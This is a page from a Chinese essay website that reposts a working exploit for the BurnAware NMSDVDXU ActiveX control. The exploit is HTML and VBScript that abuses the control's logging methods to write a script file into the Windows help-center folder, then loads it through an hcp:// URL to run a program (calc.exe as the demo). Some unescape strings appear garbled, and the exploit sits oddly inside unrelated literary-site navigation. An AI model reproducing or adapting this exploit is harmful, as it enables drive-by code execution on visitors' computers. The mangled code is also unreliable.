• 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
  • 当前位置: 山茶花美文网 > 经典文章 > 正文

    [BurnAware,NMSDVDXU,ActiveX,Remote,Arbitrary,File,Creation/Execution]File

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    -----------------------------------------------------------------------------

    BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Execution

    url: http://www.burnaware.com File: NMSDVDXU.dll <= 1.0.0.13

    CLSID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}

    ProgID: NMSDVDX.DVDEngineX.1

    Descr.: DVDEngineX Class Marked as:

    RegKey Safe for Script: False

    RegKey Safe for Init: False

    Implements IObjectSafety: True

    IDisp Safe: Safe for untrusted: caller,data

    IPersist Safe: Safe for untrusted: caller,data

    IPStorage Safe: Safe for untrusted: caller,data Author: shinnai

    mail: shinnai[at]autistici[dot]org

    site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.

    Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 myMsinfo is just hexadecimal values of: <object classid="clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8" id="compatUI"></object>

    <script language="vbscript">

    compatUI.RunApplication 1, "calc.exe", 1

    </script>

    -----------------------------------------------------------------------------

    <object classid="clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938" id="test"></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language="vbscript">

    Sub tryMe

    myMsinfo = unescape(" compatUI.Run") & _

    unescape("Application 1, "") & _

    unescape("calc.exe", 1 ") test.Initialize True

    test.EnableLog "C:WINDOWSPCHEALTHHELPCTRSystemsysinfomsinfo.htm", True

    test.LogMessage myMsinfo window.location = "hcp://system/sysinfo/msinfo.htm"

    End Sub

    </script>

    • [BurnAware,NMSDVDXU,ActiveX,Remote,Arbitrary,File,Creation/Execution]File 相关文章:
    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全